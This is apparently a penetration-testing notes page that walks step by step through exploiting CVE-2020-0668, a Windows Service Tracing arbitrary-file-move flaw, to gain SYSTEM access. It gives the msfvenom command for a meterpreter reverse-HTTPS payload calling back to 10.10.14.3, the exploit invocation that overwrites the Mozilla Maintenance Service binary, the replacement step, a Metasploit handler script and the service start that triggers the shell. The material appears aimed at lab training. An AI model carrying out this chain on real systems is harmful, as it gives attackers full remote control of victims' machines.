CVE-2020-0668

0 - Overview

Microsoft CVE-2020-0668: Windows Kernel Elevation of Privilege Vulnerability exploits an arbitrary file move vulnerability leveraging the Windows Service Tracing.

Service Tracing allows users to troubleshoot issues with running services and modules by generating debug information. Its parameters are configurable using the Windows registry.

Setting a custom MaxFileSize value (specifies the maximum size for the trace log files generated by Windows Service Tracing) that is smaller than the size of the log file prompts the file to be renamed with a .OLD extension when the service is triggered.

This move operation is performed by NT AUTHORITY\SYSTEM, and can be abused to move a file of our choosing with the help of mount points and symbolic links.

1 - Compile exploit

We can use this exploit for CVE-2020-0668, download it, and open it in Visual Studio within a VM. Building the solution will create the following files:

CVE-2020-0668.exe
CVE-2020-0668.exe.config
CVE-2020-0668.pdb
NtApiDotNet.dll
NtApiDotNet.xml

2 - Find 3rd party Service to leverage

For example Mozilla Maintenance Service . This service runs in the SYSTEM context and unprivileged users can start it.

Its binary is C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe and we only have read and execute permissions.

icacls "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

3 - Generate malicious binary

It will spawn a meterpreter reverse shell

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe

Transfer it to the target TWICE! We need a copy of it (call it maintenanceservice2.exe)

4 - Run the exploit

We run the exploit specifying the source (malicious binary) and destination (service binary to replace)

C:\Tools\CVE-2020-0668\CVE-2020-0668.exe C:\Users\hacker\Desktop\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

After we run the exploit, if we check the permission on the service binary:

 icacls 'C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe'

We see we have full access to it!

5 - Replace binary

Replace the service binary by our malicious one. The first one we transfered was corrupted by the exploit, so use the copy (rename it first xD).

copy /Y C:\Users\hacker\Desktop\maintenanceservice2.exe "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

6 - Setup Meterpreter

Create a file handler.rc

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST <IP>
set LPORT <PORT>
exploit

Then launch metasploit

sudo msfconsole -r handler.rc

7 - Start service

sc start MozillaMaintenance

The service will fail to start and we should catch the meterpreter shell on metasploit!

PreviousCVE-2021-1675/34527 PrintNightmare NextVulnerable Services

Last updated 2 years ago

hashtag0 - Overview

hashtag1 - Compile exploit

hashtag2 - Find 3rd party Service to leverage

hashtag3 - Generate malicious binary

hashtag4 - Run the exploit

hashtag5 - Replace binary

hashtag6 - Setup Meterpreter

hashtag7 - Start service